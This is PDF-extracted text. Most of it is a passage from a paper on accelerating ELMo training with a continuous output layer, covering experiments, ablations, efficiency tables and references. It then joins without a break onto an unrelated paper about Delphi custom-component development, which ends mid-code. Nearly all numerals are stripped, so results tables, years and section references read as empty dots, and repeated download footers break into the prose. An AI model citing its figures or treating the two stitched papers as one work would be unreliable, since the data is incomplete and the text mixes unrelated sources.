number of the sampled words. for the adaptive softmax and the subword language model, the communication cost is proportional to the trainable parameter size. the continuous output layer, on the other hand, incurs little com- munication cost across gpus. . open-vocabulary training we utilize the open-vocabulary word embedding as both the input and output layer embedding. open- vocabulary word embeddings, such as the fasttext embedding and the mimick model (pinter et al., ), utilize character or subword information to provide word embeddings. they could represent an unlimited number of words with a fixed number of parameters. as a result, we can train contextual encoders with an open vocabulary, which means we do not need to pre-define a closed word set as the vocabulary and the model can be trained on any sequences of words. open-vocabulary input layer to be easily ap- plied in various tasks, the contextual encoder usu- ally has an open-vocabulary input layer. elmo uses a character-cnn but it is relatively slow. thus we use a pre-trained open-vocabulary word embedding as the input layer of the contextual encoder, reducing the time complexity of the input layer to a negligible level. this also aligns with the main spirit of our approach, which is to spend computational resources on the most important part, the sequence encoder. open-vocabulary output layer for the soft- max layer, including efficient variants such as the adaptive softmax, the output vocabulary has to be pre-defined so that the normalization term can be calculated. as the softmax layer’s arithmetic complexity and parameter size grow when the vo- cabulary size grows, the vocabulary is often trun- cated to avoid expensive computation. with the continuous output layer, we can con- duct training on an arbitrary sequence of words, as long as the output embedding for those words can be derived. this can be achieved by using the open-vocabulary embedding. this feature is espe- cially attractive if we are training on domains or languages with a long-tail word distribution such as the biomedical domain, where truncating the vocabulary may not be acceptable. . interpretation of learning contextual encoders with continuous outputs in the following, we justify the intuition behind learning with continue outputs and discuss how the pre-trained word embedding affects the per- formance of the model. language models are essentially modeling the word-context conditional probability matrix, that is, a ∈ rn×v where ac,w = p(w|c), n is the number of all possible contexts, and v is the vocabulary size (levy and goldberg, ; yang et al., ). the continuous output layer can be viewed as modeling a after using the word embedding as a projection matrix. to illustrate this, consider the global objective of the layer with the cosine distance: l = ∑ (w,c) #(w, c)l(w, c) = − ∑ (w,c) #(w, c)c · w = − ∑ c #(c)c· ∑ w p(w|c)w, = − ∑ c #(c)c· ∑ w ac,ww, for simplicity, we take the cosine distance as a running example but the conclusions hold for other distance functions. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april model input sequence encoder output elmo cnn lstm sampled softmax elmo-c (ours) fasttextcc lstm w/ ln cont w/ fasttextcc elmo-a fasttextcc lstm w/ ln adaptive softmax elmo-sub subword lstm w/ ln softmax elmo-coneb fasttextoneb lstm w/ ln cont w/ fasttextoneb elmo-crnd fasttextcc lstm w/ ln cont w/ random embedding elmo-ccnn trained cnn lstm w/ ln cont w/ trained cnn elmo-ccnn-cc trained cnn lstm w/ ln cont w/ fasttextcc elmo-ccc-cnn fasttextcc lstm w/ ln cont w/ trained cnn table : specifications of variants of elmo models compared in sections and . cont means the model has continuous outputs. ln means layer normalization. where #(w, c) is the number of occurrences of the pair (w, c) in the corpus. we assume all vectors (c and w) are normalized. to optimize the inner product between c and∑ w p(w|c)w, we essentially align the direction of context vector c with the expected word vector under context c, ∑ w p(w|c)w = ew∼p(w|c)w. in other words, given a word embedding matrix w ∈ rv ×d, our approach aligns c with the cor- responding row (aw )c,: in aw . therefore, the ob- jective can be viewed as conducting multivariate regression to approximate (aw )c,: given the context. based on this view, the performance of the contextual representation model depends on how much information of the original matrix a is preserved after projection with w . in the spirit of pca (jolliffe, ), to keep the variance of a, we would like to have (aw )c,: and (aw )c′,: distant from each other if c and c′ are very different. therefore, a pre-trained word embedding, which projects words with different meanings into different positions in space, is a natural choice for the projection matrix w and can help preserve much of the variance of a. experiment we accelerate elmo with the proposed approach and show that the resulting model elmo-c is computationally efficient and maintains competi- tive performance, compared to the original elmo model (elmo), an elmo variant with the adap- tive softmax (elmo-a ), and another variant with the subword method (elmo-sub). we include elmo-a instead of a model with sampled softmax because the adaptive softmax has been shown to have superior performance (grave et al., ). . setup models in the following, we introduce the mod- els in detail. table provides a summary. the original elmo consists of a character-cnn as the input layer, a forward and backward lstm with projection as the sequence encoder, and a sampled softmax as the output layer. adagrad (duchi et al., ) is used as the optimizer. we conduct experiments using the reimplementation of elmo in allennlp (gardner et al., ) and build the others upon it. the key difference between elmo-c and elmo is that elmo-c produces continuous outputs and we train it with the cosine distance loss. a fasttext embedding trained on common crawl (mikolov et al., ) (fasttextcc) is used as the output embedding. based on preliminary experiments, we also make three minor changes: ) we use fasttextcc as the input layer as it is more efficient than the character-cnn model; ) we add a layer norm (ba et al., ) after the projection layer of the lstm to improve the convergence speed; ) we use adam with the learning rate schedule from chen et al. ( ) to help training with a large batch size. our main goal is to study how different output layers affect the training speed and performance, which cannot be achieved by just comparing elmo-c and elmo, due to the aforementioned minor changes to elmo-c. therefore, we intro- duce two additional baseline models (elmo-a and elmo-sub), which differ from elmo-c in a minimal way. specifically, their sequence en- coders and training recipes are kept the same as elmo-c. thus elmo-c, elmo-a, and elmo-sub can be directly compared. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april elmoorg base fasttextcc elmo elmo-a elmo-sub elmo-c time − − − x . x . x . x batch − − − params − − − m m m m snli . . . . . . . coref na na . . . . . sst- . . . ± . . ± . . ± . . ± . . ± . ner . . . ± . . ± . . ± . . ± . . ± . srl . . . . . . . table : computational efficiency of the main competing models and their performance on five nlp benchmarks. time is the overall training time in days x cards format. batch is the maximal batch size per card. params is the number of trainable parameters in millions. due to the small test sizes for ner and sst- , we report mean and standard deviation across three runs. our approach (elmo-c) exhibits better computational efficiency and shows comparable performance compared with elmo, elmo-a, and elmo-sub. elmo-a uses the adaptive softmax as its output layer. we carefully choose the hyper-parameters of the adaptive softmax to obtain an efficient yet strong baseline. it has only half of the parameters of the one reported in grave et al. ( ) but achieves a perplexity of . , lower than elmo’s . . elmo-sub takes subwords as input and also predicts subwords. thus, unlike other models, its vocabulary consists of around , subwords created using bpe (sennrich et al., ). for this reason, a lookup-table-style embedding rather than fasttextcc is used as its input layer and a vanilla softmax is used as its output layer. its input and output word embedding are tied and trained from scratch. for reference, we also list the results of elmo and the baseline reported in peters et al. ( a) as elmoorg and base. however, these models are evaluated using different configurations. finally, we also include fasttextcc a (non-contextual) word embedding model, as another baseline. all contextual representation models are trained on the one billion word benchmark for epochs and the experiments are conducted on a workstation with geforce gtx ti gpus, intel xeon e cpus, and g main memory. downstream benchmarks we follow peters et al. ( a) and use the feature-based approach to evaluate contextual representations on down- stream benchmarks. elmo was evaluated on six benchmarks and we conduct evaluations on five of them. squad (rajpurkar et al., ) is not available for implementation reasons. in the following, we briefly review the benchmarks and task-specific models. for details please refer to peters et al. ( a). • snli (bowman et al., ): the textual entailment task seeks to determine whether a ‘‘hypothesis’’ can be entailed from a ‘‘premise’’. the task-specific model is esim (chen et al., ). • coref: coreference resolution is the task of clustering mentions in text that refer to the same underlying entities. the data set is from conll shared task (pradhan et al., ) and the model is from lee et al. ( ). note that we use an improved version of the coref system (lee et al., ) used in peters et al. ( a). • sst- (socher et al., ): the task in- volves selecting one of five labels to describe a sentence from a movie review. we use the bcn model from mccann et al. ( ). • ner: the conll ner task (sang and de meulder, ) consists of newswire from the reuters rcv corpus tagged with four different entity types. the model is a bilstm-crf from peters et al. ( a), similar to collobert et al. ( ). • srl: semantic role labeling models the predicate-argument structure of a sentence. it the squad experiment in peters et al. ( a) was conducted with an implementation in tensorflow. the experiment setting is not currently available in allennlp (https://github.com/allenai/allennlp/ pull/ ), nor can it be easily replicated in pytorch. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/allenai/allennlp/pull/ https://github.com/allenai/allennlp/pull/ seeks to answer ‘‘who did what to whom’’. the model is from he et al. ( ) and the data set is from pradhan et al. ( ). for snli, sst- , ner, and srl, we use the same downstream models as in peters et al. ( a) re-implemented in allennlp. for coref, peters et al. ( a) uses the model from lee et al. ( ) and we use an improved model (lee et al., ) from the same authors. for all the tasks, the hyper-parameters are tuned to maximize the performance for the original elmo and all models are tested under the same configurations. . main results we report the main results in table . our ap- proach (elmo-c) enjoys a substantial compu- tational advantage while maintaining competitive or even superior performance, compared to elmo, elmo-a, and elmo-sub. model efficiency for model efficiency, the statistics of elmo is reported by the original authors and they use three gtx tis. we train elmo-a, elmo-sub, and elmo-c using four gtx tis. roughly speaking, compared with elmo, elmo-c is . x faster and x more memory-efficient. to give a clear view of the speedup the cont layer brings, we compare elmo-c with elmo-a. elmo-a differs from elmo-c only in the output layer. still, elmo- c has a . x speed advantage and is x more memory-efficient. compared with elmo-sub, our approach holds a . x speed advantage and is x more memory-efficient. the results here only show the overall efficiency of our approach under the setting of elmo and a detailed analysis of the efficiency is desirable, which we provide in section . . performance on downstream tasks elmo-c works especially well on semantic-centric tasks, such as snli, coref, and sst- . however, for tasks that required a certain level of syntactic information, such as ner and srl (he et al., ), elmo-c suffers from slight performance degradation compared with elmo, but it remains competitive with elmo-a and elmo-sub. we suspect that the performance degradation is related to the pre-trained embedding and conduct further analysis in section . . for srl, the score reported by allennlp is lower than the score reported by conll official script. in addition, we notice that the performance of elmo-sub is unstable. it shows satisfying per- formance on sst- , ner, and srl. however, it lags behind on coref and even fails to outper- form fasttextcc on snli. elmo-sub provides subword-level contextual representations, which we suspect could be the cause of unstable perfor- mance. specifically, to get the representation for a word in evaluation on word-level tasks, we follow devlin et al. ( ) to use the representation of its first subword. this could be sub-optimal if precise word-level representation is desired (e.g., the suf- fix of a word is an important feature). these results are consistent with the observation in kitaev and klein ( ). they find that special design has to be made to apply bert to constituency parsing because of the subword segmentation. however, we notice that the scope of our experiment is lim- ited. it is likely that when elmo-sub is scaled up or used with the fine-tuning method, the afore- mentioned issue is alleviated—we leave that to future work. analysis we conduct analysis regarding the effect of the pre-trained word embedding on the performance of the contextual encoder. we also investigate the contributions of different factors to the overall training time and study the speedup of our ap- proach under various conditions. . effect of the pre-trained embedding we show the effect of the pre-trained embedding by introducing several variants of elmo-c (sum- marized in table ) and list their performance in table . quality of the pre-trained embedding we aim to understand how the quality of the pre- trained output word embedding w affects the performance of the contextual encoder. to study this, we train a fasttext word embedding on the one billion word benchmark, a much smaller corpus than common crawl. we then train an elmo-c variant, elmo-coneb , by using this em- bedding in the input and output layers. com- paring it to elmo-c, elmo-coneb holds up surprisingly well and it is competitive on snli, coref, and sst- while being inferior on ner and srl. this motivates us to take a step further and use a completely random output word embedding. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april task elmo-c elmo-coneb elmo-crnd elmo-ccnn elmo-ccnn-cc elmo-ccc-cnn snli . . . . . . coref . . . . . . sst- . ± . . ± . . ± . . ± . . ± . . ± . ner . ± . . ± . . ± . . ± . . ± . . ± . srl . . . . . . table : performance of ablation models on five nlp benchmarks. elmo-c is included for reference. we replace the output embedding of elmo-c with a random embedding matrix, of which each element is randomly drawn from a standard normal distribution. we denote this model as elmo-crnd. we find that this model performs well (table ), with only a mild performance drop compared to elmo-c. the performance of elmo-crnd shows the robustness of the proposed approach and demonstrates that the deep lstm is expressive enough to fit a complex output space. however, we find that the pre-trained input word embedding is still indispensable because using a randomly initialized input embedding would lead to brittle performance (e.g., . on snli). pre-trained cnn layer as word embedding in section , we observed that models using fast- text embedding (elmo-c and elmo-a) as input performed worse than elmo on srl, a task relying heavily on syntactic information. we suspect that the fasttext embedding is weaker on capturing syntactic information than the character-cnn trained in elmo (peters et al., b). to verify this, we train elmo-c using the trained cnn layer from elmo as the input layer (elmo-ccnn-cc) or the output embedding (elmo-ccc-cnn). we observe that the two models exhibit notably better performance on srl (see table ). we also consider a elmo-ccnn model, which uses the cnn layer as both the input and output embedding. on srl, elmo-ccnn per- forms favorably compared to elmo-c but slightly worse than elmo-ccnn-cc or elmo-ccc-cnn. we suspect that this is because elmo-ccnn-cc and elmo-ccc-cnn benefit from different kinds of embeddings in the input layer and the output layer. . computational efficiency next, we study the computational efficiency of the continuous output layer against several baselines from two aspects. first, in section . , we dis- cussed three factors governing the overall training time of the model: ) arithmetic complexity, ) gpu memory consumption, and ) communica- tion cost. we aim to study how each factor affects the overall training time of each model. second, in the above experiments, we focus on elmo with the lstm as the sequence encoder. we wonder whether the continuous output layer can deliver attractive speedup for sequence encoders of different types and sizes. we investigate the continuous output layer (cont) and three common baseline output layers: ) the subword-level language model (subword), ) the adaptive softmax layer (adaptive), and ) the sampled softmax layer (sampled). addition- ally, we include a variant of the sampled softmax denoted as fixed where the output word embed- ding is initialized by the fasttext embedding and fixed during the training. this output layer is similar to a special case of cont with a ranking loss, where the model encourages its output to be close to the target word embedding but far from a negative sample. in total, we study five different output layers. for several output layers, the trade-off between computational efficiency and model performance is controlled by their hyper-parameters. we choose hyper-parameters close to those reported in the literature to strike a balance between speed and performance. . . speedup breakdown we pair the five different output layers with the same input layer (fixed word embedding) and sequence encoder (elmo’s lstm with projec- tion). we then test the training speed of these models under three scenarios, which are designed to reflect the individual effect of the arithmetic complexity, the gpu memory consumption, and the communication cost: • s (small batch): we use one gpu card and set the batch size to be . the asynchronous execution feature of the gpu is disabled. the time needed to finish one batch is reported. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april vocab params batch s (small batch) s (large batch) s (multiple gpus) cont ∞ m . s . s . s fixed ∞ m . x . x . x subword ∞ m . x . x . x adaptive k m . x . x . x k m . x . x . x k m . x . x . x sampled k m . x . x . x k m . x . x . x k m . x . x . x table : statistics on the computation efficiency of different models. for cont, we report the actual training time in seconds. for other models, we report the relative training time compared to cont. params: number of trainable parameters of the whole model in millions. batch: maximal batch size per card. • s (large batch): we use one gpu card and the maximal batch size. the time needed to finish training on one million words for each model is reported. • s (multiple gpus): we use gpu cards and the maximal batch size. the time needed to finish training on one million words for each model is reported. in table , we report the training speed of the models under each scenario. in addition, we report the parameter size and the maximal batch size on one gpu card. for adaptive and sampled, the vocabulary size also affects the training speed so we test them under three different vocabulary sizes: k, k, and , k. arithmetic complexity the arithmetic com- plexity of the models is reflected by the speed under s , where the gpu memory is always abundant and the arithmetic complexity is the dominating factor. cont holds a mild advan- tage ( . x- . x) over baseline models, which is expected because the lstm layers in elmo cont under s is slightly slower than the elmo-c model reported in section . . this is because when training the elmo-c model reported in . , we actually train a forward elmo-c on two cards and train a backward elmo-c on two other cards, which reduces the communication cost by half. this optimization is only applicable to our approach in the setting of elmo and does not work for other baseline methods. in this experiment, we disable this optimization for generosity. the , k vocabulary is created on the tokenized - billion-word common crawl corpus (panchenko et al., ), which covers words that appear more than times. are quite slow and that undermines the advantage of the continuous output layer. for elmo-sub, the small yet non-negligible softmax layer adds overhead to the arithmetic complexity. fixed, adaptive, and sampled have similar arithmetic complexity but adaptive has the highest com- plexity when the vocabulary size is large (e.g., , k). gpu memory consumption the effect of gpu memory consumption can be observed by comparing the statistics under s and s . the difference between s and s is that the parallel computing of the gpu is fully utilized. for cont, its great gpu memory efficiency helps it gain larger speedup under s , especially against common baselines such as subword, adaptive, and sampled. for elmo-sub, in addition to the overhead from the softmax layer, breaking words into subwords leads to longer sequences, which increases the training time by . x. thus it is . x slower than cont under s . sampled suffers from its huge parameter size and exhibits poor scalability with respect to the vocabulary size ( . x slower when the vocabulary size reaches , k). communication cost the effect of the com- munication cost across gpus can be observed by comparing the statistics under s and s . as the communication cost and gpu memory consumption both are highly dependent on the parameter size, the observations are similar. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april lstm lstmx trans base elmo trans large gpt cont . s . s . s . s . s . s fixed . x . x . x . x . x . x subword . x . x . x . x . x . x adaptive . x . x . x . x . x . x sampled . x . x . x . x oom . x table : time needed to finish training on one million words for each model using gpu cards and the maximal batch size. for cont, we report the actual training time in seconds. for other models, we report the relative training time compared to cont. oom means that the gpu memory is not sufficient. cont shows substantial speedup over common baselines under all scenarios. . . the continuous output layer with different sequence encoders for this experiment, we pair the output layers with different sequence encoders and investigate their training time. we start from a single-layer lstm with a hidden size of (lstm) and a two-layer version (lstmx ), both reported in grave et al. ( ). they are all smaller than the sequence encoder used in elmo. we then scale up to the forward and backward transformer reported in peters et al. ( b) (trans base) and the multi-layer lstm with projection in elmo(elmo). finally, we test two larger trans- former, trans large, a scaled-up version of trans base, and a uni-directional transformer (denoted as gpt) with the same size as bertbase (devlin et al., ) and gpt (radford et al., ), respectively. for all models but gpt, the lengths of the input sequences are fixed at . for gpt, we use input sequences of length , following its original setting. for adaptive and sampled, we fix the vocabulary size at k. we report the training time of each model using four gpu cards and the maximal batch size (s ) in table . we find that the continuous output layer remains attractive, even when the sequence encoder is as large as gpt. in that case, the speedup of cont over subword, adaptive, and sampled is still substantial ( . x - . x). in addition, we observe that for sequence encoders of the same type, more complex they get, less speedup cont enjoys, which is expected. for instance, from lstm to lstmx , the speedup of cont decreases noticeably. however, the speedup the continuous output brings also depends on the architecture of the sequence encoder. for instance, though trans base and trans large are more complex than lstmx , cont enjoys larger speedup with those transformers. profiling the training process of sequence decoders such as lstm and the transformer on gpu devices is an interesting research topic but out of the scope of this study. conclusion we introduced an efficient framework to learn contextual representation without the softmax layer. the experiments with elmo showed that we significantly accelerate the training of the current models while maintaining competitive performance on various downstream tasks. acknowledgments we wish to thank the anonymous reviewers, the editor, mark yatskar, muhao chen, xianda zhou, and members at uclanlp lab for helpful comments. we also thank yulia tsvetkov and sachin kumar for help with implementing the continuous output layer as well as jieyu zhao, kenton lee, and nelson liu for providing re- producible source code for experiments. this work was supported by national science foundation grant iis- and iis- . references jimmy lei ba, jamie ryan kiros, and geoffrey e hinton. . layer normalization. arxiv preprint arxiv: . . yoshua bengio and jean-sébastien senécal. . quick training of probabilistic neural nets by importance sampling. in aistats. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in emnlp. james bradbury, stephen merity, caiming xiong, and richard socher. . quasi-recurrent neu- ral networks. arxiv preprint arxiv: . . ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robinson. . one billion word bench- mark for measuring progress in statistical lan- guage modeling. arxiv preprint arxiv: . . mia xu chen, orhan firat, ankur bapna, melvin johnson, wolfgang macherey, george foster, llion jones, mike schuster, noam shazeer, niki parmar, ashish vaswani, jakob uszkoreit, lukasz kaiser, zhifeng chen, yonghui wu, and macduff hughes. . the best of both worlds: combining recent advances in neural machine translation. in acl. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. . enhanced lstm for natural language inference. in acl. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel p. kuksa. . natural language processing (almost) from scratch. journal of machine learn- ing research, : – . yann n. dauphin, angela fan, michael auli, and david grangier. . language modeling with gated convolutional networks. in icml. jacob devlin, ming-wei chang, kenton lee, and kristina toutanova. . bert: pre-training of deep bidirectional transformers for language understanding. in naacl-nlt . john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . matt gardner, joel grus, mark neumann, oyvind tafjord, pradeep dasigi, nelson f. liu, matthew e. peters, michael schmitz, and luke zettlemoyer. . allennlp: a deep semantic natural language processing platform. arxiv preprint arxiv: . . priya goyal, piotr dollár, ross girshick, pieter noordhuis, lukasz wesolowski, aapo kyrola, andrew tulloch, yangqing jia, and kaiming he. . accurate, large minibatch sgd: training imagenet in hour. arxiv preprint arxiv: . . edouard grave, armand joulin, moustapha cissé, david grangier, and hervé jégou. . effi- cient softmax approximation for gpus. arxiv preprint arxiv: . . luheng he, kenton lee, mike lewis, and luke zettlemoyer. . deep semantic role label- ing: what works and what’s next. in acl. shexia he, zuchao li, hai zhao, and hongxiao bai. . syntax for semantic role labeling, to be, or not to be. in acl. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, : – . yacine jernite, samuel r bowman, and david sontag. . discourse-based objectives for fast unsupervised sentence representation learn- ing. arxiv preprint arxiv: . . ian jolliffe. . principal component analysis. in international encyclopedia of statistical science, springer berlin heidelberg. rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . explor- ing the limits of language modeling. arxiv pre- print arxiv: . . yoon kim, yacine jernite, david sontag, and alexander m. rush. . character-aware neural language models. in aaai. ryan kiros, yukun zhu, ruslan r. salakhutdinov, richard zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in nips. nikita kitaev and dan klein. . multilingual constituency parsing with self-attention and pre-training. arxiv preprint arxiv: . . sachin kumar and yulia tsvetkov. . von mises-fisher loss for training sequence to sequence models with continuous outputs. in iclr. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april kenton lee, luheng he, mike lewis, and luke zettlemoyer. . end-to-end neural coref- erence resolution. in emnlp. kenton lee, luheng he, and luke zettlemoyer. . higher-order coreference resolution with coarse-to-fine inference. in naacl-hlt . tao lei, yu zhang, sida i. wang, hui dai, and yoav artzi. . simple recurrent units for highly parallelizable recurrence. in emnlp. omer levy and yoav goldberg. . neural word embedding as implicit matrix factorization. in nips. lajanugen logeswaran and honglak lee. . an efficient framework for learning sentence representations. iclr. bryan mccann, james bradbury, caiming xiong, and richard socher. . learned in translation: contextualized word vectors. in nips. stephen merity, nitish shirish keskar, and richard socher. . an analysis of neural language modeling at multiple scales. arxiv preprint arxiv: . . tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word representations in vector space. arxiv preprint arxiv: . . tomas mikolov, edouard grave, piotr bojanowski, christian puhrsch, and armand joulin. . advances in pre-training distributed word rep- resentations. arxiv preprint arxiv: . . a mnih and yw teh. . a fast and simple algorithm for training neural probabilistic language models. in icml. frederic morin and yoshua bengio. . hier- archical probabilistic neural network language model. in aistats. alexander panchenko, eugen ruppert, stefano faralli, simone paolo ponzetto, and chris biemann. . building a web-scale dependency- parsed corpus from commoncrawl. arxiv preprint arxiv: . . matthew e. peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. a. deep contex- tualized word representations. in naacl-hlt . matthew e. peters, mark neumann, luke zettlemoyer, and wen-tau yih. b. dissect- ing contextual word embeddings: architecture and representation. in emnlp. yuval pinter, robert guthrie, and jacob eisenstein. . mimicking word embeddings using sub- word rnns. in emnlp. sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic analysis using ontonotes. in conll. sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multi- lingual unrestricted coreference in ontonotes. in joint conference on emnlp and conll- shared task. alec radford, karthik narasimhan, tim salimans, and ilya sutskever. . improving language understanding by generative pre-training. openai blog. alec radford, jeffrey wu, rewon child, david luan, dario amodei, and ilya sutskever. . language models are unsupervised multitask learners. openai blog. pranav rajpurkar, jian zhang, konstantin lopyrev, and percy liang. . squad: , + questions for machine comprehension of text. in emnlp. erik f sang and fien de meulder. . introduc- tion to the conll- shared task: language- independent named entity recognition. arxiv preprint cs/ . rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. in acl. richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew y. ng, and christopher potts. . recursive deep models for semantic compositionality over a sentiment treebank. in emnlp. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april emma strubell, ananya ganesh, and andrew mccallum. . energy and policy consid- erations for deep learning in nlp. arxiv preprint arxiv: . . shuai tang, hailin jin, chen fang, zhaowen wang, and virginia de sa. . speeding up context- based sentence representation learning with non-autoregressive convolutional decoding. in workshop on representation learning for nlp. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, lukasz kaiser, and illia polosukhin. . attention is all you need. in nips. yonghui wu, mike schuster, zhifeng chen, quoc v. le, mohammad norouzi, wolfgang macherey, maxim krikun, yuan cao, qin gao, klaus macherey, jeff klingner, apurva shah, melvin johnson, xiaobing liu, lukasz kaiser, stephan gouws, yoshikiyo kato, taku kudo, hideto kazawa, keith stevens, george kurian, nishant patil, wei wang, cliff young, jason smith, jason riesa, alex rudnick, oriol vinyals, gregory s. corrado, macduff hughes, and james a. dean. . google’s neural machine translation system: bridging the gap between human and machine translation. arxiv preprint arxiv: . . zhilin yang, zihang dai, ruslan salakhutdinov, and william w. cohen. . breaking the soft- max bottleneck: a high-rank rnn language model. arxiv preprint arxiv: . . yang you, zhao zhang, cho-jui hsieh, james demmel, and kurt keutzer. . imagenet training in minutes. in proceedings of the th international conference on parallel process- ing, icpp . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction background and related work approach computational efficiency learning with continue outputs overall training time open-vocabulary training interpretation of learning contextual encoders with continuous outputs experiment setup main results analysis effect of the pre-trained embedding computational efficiency speedup breakdown the continuous output layer with different sequence encoders conclusion paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on method of rapid software development based on component design hu jingyi school of computer science and engineering xi’an technological university xi'an, , china e-mail: @qq.com lei juchao school of computer science and engineering xi’an technological university xi'an, , china wang yaming school of computer science and engineering xi’an technological university xi'an, , china e-mail: @qq.com zhao yalin school of computer science and engineering xi’an technological university xi'an, , china e-mail: zhaoyalin @qq.com abstract—this this article presents a quick way to develop your system with custom components in delphi. use the above method can minimize code duplication, improve work efficiency. in this paper, we apply this method to the development of information management system in a university based on the data snap three-tier architecture. through practice, we find that the workload of the original three months, and we only need days to complete. therefore, adopting the rapid software development method based on component design proposed in this paper can not only shorten the programming time of management systems such as erp and information management by more than two thirds, but also bring great advantages in system development. keywords-delphi; custom components; erp; efficiency; time i. introduction with the advent of the information age, we are more and more inseparable from technology. now developed a lot of pc software such as information management systems that can help people save a lot of manpower, material resources. especially every year at the end of annual work statistics, the design of a set of software through the relevant settings for automatic statistical calculation, approval, access and other functions is necessary. the completion of the software can be fully realized at any time computer statistics automatically calculate the workload of a variety of teaching and research, but also can effectively avoid errors in the calculation process. there are a lot of software that uses a lot of languages to develop the pc end now, but to the visual software development, this text uses delphi to finish. and delphi is a powerful, windows-based environment, object-oriented visual application development tool. it combines the power of the traditional programming language object pascal with the database language for both traditional arithmetic programming and database programming. the data snap technology system in delphi provides a mechanism for transferring database information between the client and the application server. meanwhile, the rich component library brings great convenience to the program design. delphi has become one of the most popular visual software development tools today. when we used delphi to develop pc software, we developed a way to customize the components to complete the software development and make the program completed in three months and we only need days to complete. ii. theoretical basis a. practicality of custom components in a system development, design a custom component. in the process of system development can be based on the analysis of needs sorted out the same part of the logic function, the use of custom components to complete the corresponding function. therefore, anytime, anywhere custom components into different needs of the interface according to the corresponding function, reduce code duplication and greatly facilitate the development of programming speed. in an erp system to do needs analysis, we will find a lot of repetitive logic requirements, for example: doing computer college information management system, whether it is to deal with college business or teachers related to the operation, there are for the basic data to add, modify, delete and so on. that by designing custom components: add button to complete the corresponding function, into the page you need to complete its specific functions and greatly reduce the programmer's efficiency. b. inheritance of custom components delphi component is an object library, but also a class. the base class for all objects in delphi is tobject, and the most primitive base class for a component is tobject, as shown in figure . international conference on sensor network and computer engineering (icsnce ) tobject exception tinterfacedobject tstream tpersistent tcomobject tgraphicobjtce tgraphic tcomponent tcollection tstrings tapplication tdataset tmenu tcontrol tcommondialog tfield figure . example of a one-column figure caption. the hierarchy of components in this structure is: tobject ----> tpersistent -----> tcomponent -----> tcontrol. tcomponent, the base class for all delphi components, inherits from this class for all object libraries that you want to register directly with the ide for visualization. tcomponent provides the necessary information to make the component work on delphi's ide. then tcomponent derives the tcontrol class, which is the base class for all flagship visual controls. all of our components are based on tcomponent. iii. experiment and test a. the basis for custom component development in the development of custom components we need to analyze a page needs and then do some work:  data acquistion: in general, we are all custom components that design functionality, and we need to get the data or output the data. in each page there will be a lot of data-type components, how do we find the corresponding data components, you can design components by the naming rules to find the corresponding data-type components. for example: set the settings in the component, to the components of a unified naming rules such as: cktext _xxxx,xxxx for the database table field names, according to cktext can find the components needed, according to the xxxx components and database fields correspond.  data transfer: passing data using json. json is a lightweight data exchange format based on a subset of ecmascript that stores and represents data in a completely independent of the programming language. there are only two structures in json: objects and arrays json values consist of numbers, strings, logical values, arrays, objects, null, and so on. using json as a data exchange format between the client and the server, the json data format can be used directly by the server, greatly simplifying the code development of the client and server, and easier to maintain. and the data format is relatively simple, easy to read and write, the format is compressed, occupy a small bandwidth.  mutual exclusion between functional components: when the button on click is executed, in order to avoid data confusion, you must make the button is not related to the button is invalid. for example, when you click the add button in the information management system, the buttons, such as modify, delete, archive, data export, return, etc., must be inactive. the save and cancel buttons must be valid. when the save or cancel button is clicked, buttons such as add, edit, archive and return should be valid, while save and cancel buttons should be inactive. therefore, the entire information management system interface point of view, in addition to archiving, data printing, return no mutual exclusion, the other buttons need to be mutually exclusive with other buttons. b. associations between components in the page there are many custom components in a page, but we need to know the current step to the program flow, the current table, the current operator, the current name from the table, and others. then we need to design a custom template components on each page, template components design attributes as shown in table : table i. template attributes template attributes explanation template attributes explanation mb_lcmc process name mb_prior_step step number mb_now_step the current step number mb_next_step next step number mb_tablename the current table name mb_prior_tablena me pre-step name mb_lb_field category field mb_lb_name category name mb_cb_tablena me from the table name mb_next_tablenam e next table name mb_next_table nameb next table name mb_next_lczttable name next process status table name mb_next_lbna me next category mb_next_lbfield next category field mb_yzd data upload original field mb_mbzd data download target field mb_czr operator mb_cjyh root name template name tag mark field mb_lc_yesno is it a process? others as spare fields c. implementation of custom component development after the preparation of the above two parts, the process of custom components in delphi contains the following steps:  create a library unit that contains new parts.  member has inherited a new type of component type.  add properties, methods and events.  register parts with delphi.  create help files for the component's properties methods and events. custom components such as adding components the main code is as follows: uses system. sysutils, system. classes, vcl. controls, vcl. stdctrls, vcl. buttons, vcl. comctrls , dbgrideh, math, datasnap. dbclient, mysave, iniboxes, mygd wgd, 